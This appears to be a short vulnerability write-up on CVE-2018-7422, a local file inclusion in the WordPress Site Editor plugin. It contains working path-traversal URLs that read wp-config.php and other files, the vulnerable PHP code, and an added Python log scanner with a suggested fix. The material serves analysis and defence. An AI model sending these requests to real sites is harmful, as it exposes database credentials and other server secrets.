# CVE-2018-7422 (WordPress plugin SITE EDITOR 1.1.1)

###### tags: `CVE` `wordpress`

Install the SITE EDITOR 1.1.1 plugin. Install it manually, because the archive is too large to upload through the admin panel.

## POC:

Affected URL:

```
http://localhost/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php
```

The GET parameter `ajax_path` can locally include an arbitrary file.

PoC: this one fails, because the target is a PHP file and gets parsed by the interpreter; if it were a one-line webshell the situation would be different.

```
http://localhost/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=../../../../../../../wp-config.php
```

This can be used to read files:

```
http://localhost/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=../../../../../../../license.txt
```

## Analysis:

There is no filtering, and the value is fully controlled by the request. `is_file()` and `file_exists()` only check that the path exists; they do nothing to stop `../` traversal or absolute paths, so anything readable by the web server can be included.

Vulnerable code in `wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php` (unchanged from the plugin, closing brace restored):

```php
// $_REQUEST['ajax_path'] is taken verbatim from the request and never
// constrained to the plugin's own directory before being included.
if( isset( $_REQUEST['ajax_path'] ) && is_file( $_REQUEST['ajax_path'] ) && file_exists( $_REQUEST['ajax_path'] ) ){
    require_once $_REQUEST['ajax_path'];
}
```

## Thoughts:

So satisfying, so simple.
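The following is an added detection example, not code from the plugin or from the original note. It scans web-server access-log lines for requests to `ajax_shortcode_pattern.php` whose `ajax_path` value would resolve outside the plugin's `includes` directory, using the same canonicalisation (join with the base directory, normalise, then check the prefix) that a hardened version of the PHP check would need. It assumes Apache combined log format and a document root of `/var/www/html`; the log lines are constructed for the example and are not real traffic.

```python
import posixpath
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Assumed install location of the vulnerable script (docroot /var/www/html).
INCLUDES_DIR = "/var/www/html/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes"

# Constructed sample access-log lines (Apache combined format), not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Mar/2018:12:00:01 +0000] "GET /wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=../../../../../../../wp-config.php HTTP/1.1" 200 512 "-" "curl/7.58.0"
10.0.0.5 - - [10/Mar/2018:12:00:02 +0000] "GET /wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=..%2F..%2F..%2F..%2F..%2F..%2F..%2Flicense.txt HTTP/1.1" 200 19935 "-" "curl/7.58.0"
10.0.0.7 - - [10/Mar/2018:12:00:03 +0000] "GET /wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=patterns/example.php HTTP/1.1" 200 140 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Mar/2018:12:00:04 +0000] "GET /index.php HTTP/1.1" 200 4023 "-" "Mozilla/5.0"
"""

# Minimal combined-log parser: client IP, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def resolve_ajax_path(value, base=INCLUDES_DIR):
    """Canonical absolute path that require_once would load for this value.

    A second unquote() catches double-encoded traversal sequences; an absolute
    value replaces the base entirely, exactly as PHP's include would treat it.
    """
    decoded = unquote(value)
    return posixpath.normpath(posixpath.join(base, decoded))


def is_outside(resolved, base=INCLUDES_DIR):
    """True when the canonical path escapes the plugin's includes directory."""
    base = base.rstrip("/")
    return not (resolved == base or resolved.startswith(base + "/"))


def scan_log(text):
    """Return one finding per ajax_path value that resolves outside INCLUDES_DIR."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        if not parts.path.endswith("/ajax_shortcode_pattern.php"):
            continue
        # parse_qs percent-decodes once; resolve_ajax_path decodes again.
        for value in parse_qs(parts.query, keep_blank_values=True).get("ajax_path", []):
            resolved = resolve_ajax_path(value)
            if is_outside(resolved):
                findings.append({
                    "ip": m.group("ip"),
                    "time": m.group("ts"),
                    "status": m.group("status"),
                    "ajax_path": value,
                    "resolved": resolved,
                })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ip']} {f['time']} status={f['status']} -> {f['resolved']}")
```

A status of 200 on a flagged request is the strongest signal: the `is_file()` check in the plugin means a 200 response implies the traversed path existed and was included. The prefix check in `is_outside()` is also the shape of the fix the plugin needed: resolve the requested path against a fixed base directory and refuse anything that does not stay under it.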